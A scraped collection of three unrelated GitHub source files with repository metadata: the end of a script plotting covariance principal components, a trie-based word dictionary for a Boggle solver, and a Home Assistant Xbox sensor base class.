w, v = LA.eigs(np.reshape(mat, (cols,rows)), k=15)
img = np.zeros((psize*3,psize*5))
for j in range(0,3):
for i in range(0,5):
for y in range(0,psize):
for x in range(0,psize):
img[(j*psize+y),(i*psize+x)] = v[:,j*5+i].reshape(psize,psize)[y,x]
imgplt = plt.imshow(np.real(img))
imgplt.set_cmap('gray')
imgplt.set_clim(-0.1,0.1) # Guess range
plt.title('Principal Components of Covariance Matrix')
plt.colorbar()
plt.show()
finally:
f.close()
| {
"content_hash": "b626d46abdd1e7a864b17d246d5d8dcb",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 100,
"avg_line_length": 29.603448275862068,
"alnum_prop": 0.5934769947582994,
"repo_name": "hrushikesh-dhumal/hipi",
"id": "a8e23ab14ed5804d0be38e2b5818005979d054c6",
"size": "1736",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "util/showCovarianceOutput.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "5665"
},
{
"name": "HTML",
"bytes": "152766"
},
{
"name": "Java",
"bytes": "238812"
},
{
"name": "Matlab",
"bytes": "821"
},
{
"name": "Python",
"bytes": "1736"
},
{
"name": "Shell",
"bytes": "1127"
}
],
"symlink_target": ""
} |
"""Stores the dictionary in a linked list."""
from bogglesolver.twl06 import WORD_LIST
from bogglesolver.twl06 import TEST_WORD_LIST
class _dictnode:
"""
An element of the dictionary.
Each element represents one letter in a word.
Each element contains an array of potential next elements.
This means that look-up time for a word depends only on the
length of the word.
It also means that if you have a partial word,
all potential endings are further down the tree.
"""
def __init__(self):
self.letters = {}
self.word = ""
def add_letter(self, word, index, word_len):
"""
Add a word letter by letter to the tree.
:param str word: word that should be added.
:param str index: current index for the letter to add.
"""
if word_len > index:
if word[index] in self.letters.keys():
self.letters[word[index]].add_letter(word, index + 1, word_len)
else:
self.letters[word[index]] = _dictnode()
self.letters[word[index]].add_letter(word, index + 1, word_len)
else:
self.word = word
class Edict:
"""
The interface for the dictionary.
Contains the root element of the dictionary.
Contains helpful functions for creating, adding to,
and accessing the dictionary elements.
"""
def __init__(self):
self.dictionary_root = _dictnode()
def read_dictionary(self, use_test_words=False):
"""
Read in the list of valid words and add them to the dictionary.
:param bool use_test_words: whether to use
the test words or actual words.
"""
words = None
if use_test_words:
words = TEST_WORD_LIST
else:
words = WORD_LIST
for word in reversed(words):
self.add_word(word.lower())
def is_word(self, word):
"""
Determine if a word is in the dictionary.
Lookup in the dictionary is O(n)
:param str word: word to look for in the dictionary.
:returns: True if word is in dictionary. Otherwise False.
"""
node = self.get_last_node(self.dictionary_root, word.lower())
return node.word != "" if node else False
def add_word(self, word):
"""
Add a word to the dictionary.
This is for extending the dictionary.
:param str word: word to add.
"""
self.dictionary_root.add_letter(word.lower(), 0, len(word))
def get_words(self, node, all_words=[]): # pylint: disable=W0102
"""
Get all words from the specified node on down.
If called with the root node passed in,
returns all words in the dictionary.
:param _dictnode node: node to get all words from.
:param list all_words: list of all words found so far.
:returns: all words from the node on down.
"""
for a_node in node.letters.keys():
all_words = self.get_words(node.letters[a_node], all_words)
if node.word and node.word not in all_words:
all_words.append(node.word)
return all_words
@staticmethod
def get_last_node(node, letter):
"""
Determine if the letter provided is a valid path from the provided node.
:param _dictnode node: node in the Edict.
:param str letter: next letter.
:returns: True if the node has a path for the given letter, False Otherwise
"""
for l in letter:
if l not in node.letters.keys():
return None
node = node.letters[l]
return node
| {
"content_hash": "804f497dd323e7d788e819266169772d",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 83,
"avg_line_length": 30.418032786885245,
"alnum_prop": 0.5914847749932632,
"repo_name": "theovoss/BoggleSolver",
"id": "78e54f079c58d43bb71256ff8cd37106facee2df",
"size": "3734",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bogglesolver/load_english_dictionary.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8827"
},
{
"name": "Python",
"bytes": "2335059"
}
],
"symlink_target": ""
} |
"""Base Sensor for the Xbox Integration."""
from __future__ import annotations
from yarl import URL
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import PresenceData, XboxUpdateCoordinator
from .const import DOMAIN
class XboxBaseSensorEntity(CoordinatorEntity[XboxUpdateCoordinator]):
"""Base Sensor for the Xbox Integration."""
def __init__(
self, coordinator: XboxUpdateCoordinator, xuid: str, attribute: str
) -> None:
"""Initialize Xbox binary sensor."""
super().__init__(coordinator)
self.xuid = xuid
self.attribute = attribute
@property
def unique_id(self) -> str:
"""Return a unique, Home Assistant friendly identifier for this entity."""
return f"{self.xuid}_{self.attribute}"
@property
def data(self) -> PresenceData | None:
"""Return coordinator data for this console."""
return self.coordinator.data.presence.get(self.xuid)
@property
def name(self) -> str | None:
"""Return the name of the sensor."""
if not self.data:
return None
if self.attribute == "online":
return self.data.gamertag
attr_name = " ".join([part.title() for part in self.attribute.split("_")])
return f"{self.data.gamertag} {attr_name}"
@property
def entity_picture(self) -> str | None:
"""Return the gamer pic."""
if not self.data:
return None
# Xbox sometimes returns a domain that uses a wrong certificate which creates issues
# with loading the image.
# The correct domain is images-eds-ssl which can just be replaced
# to point to the correct image, with the correct domain and certificate.
# We need to also remove the 'mode=Padding' query because with it, it results in an error 400.
url = URL(self.data.display_pic)
if url.host == "images-eds.xboxlive.com":
url = url.with_host("images-eds-ssl.xboxlive.com").with_scheme("https")
query = dict(url.query)
query.pop("mode", None)
return str(url.with_query(query))
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return self.attribute == "online"
@property
def device_info(self) -> DeviceInfo:
"""Return a device description for device registry."""
return DeviceInfo(
entry_type=DeviceEntryType.SERVICE,
identifiers={(DOMAIN, "xbox_live")},
manufacturer="Microsoft",
model="Xbox Live",
name="Xbox Live",
)
| {
"content_hash": "e2eb8ff8c3064605dde0c69ad41b5d4a",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 102,
"avg_line_length": 35.70886075949367,
"alnum_prop": 0.640907479617157,
"repo_name": "mezz64/home-assistant",
"id": "5d0f3f92434e9e743ac33da2018655ef47aa01db",
"size": "2821",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/xbox/base_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.